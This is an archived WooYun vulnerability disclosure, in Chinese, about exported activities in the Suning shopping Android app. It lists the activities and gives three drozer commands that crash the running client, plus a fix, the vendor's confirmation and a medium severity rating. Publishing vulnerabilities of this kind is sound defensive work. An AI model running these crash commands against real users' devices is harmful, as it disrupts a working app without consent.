乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-04: 细节已通知厂商并且等待厂商处理中 2015-06-05: 厂商已经确认,细节仅向厂商公开 2015-06-08: 细节向第三方安全合作伙伴开放 2015-07-30: 细节向核心白帽子及相关领域专家公开 2015-08-09: 细节向普通白帽子公开 2015-08-19: 细节向实习白帽子公开 2015-09-03: 细节向公众公开
RT
先上图
暴露的activity:
dz> run app.activity.info -a com.suning.mobile.ebuyPackage: com.suning.mobile.ebuy com.suning.mobile.ebuy.wxapi.WXEntryActivity com.suning.mobile.ebuy.goodsdetail.ui.CargoDetailActivity com.suning.mobile.ebuy.host.initial.InitialActivty com.unionpay.upomp.bypay.activity.SplashActivity com.suning.mobile.paysdk.ui.CashierPrepareActivity com.tencent.tauth.AuthActivity com.suning.dl.ebuy.dynamicload.SuningDLProxyActivity com.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivity com.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivity
客户端的Activity:
com.suning.dl.ebuy.dynamicload.SuningDLProxyActivitycom.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivitycom.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivity
对外暴露,发送Intent启动,会导致运行中的客户端直接崩溃退出验证代码
dz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxyFragmentActivitydz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxySingleTaskActivitydz> run app.activity.start --component com.suning.mobile.ebuy com.suning.dl.ebuy.dynamicload.SuningDLProxyActivity
设置export为false,或者在代码中添加try-catch捕获异常
危害等级:中
漏洞Rank:10
确认时间:2015-06-05 17:54
感谢提交,目测漏洞存在,稍后送上200元礼品卡。
暂无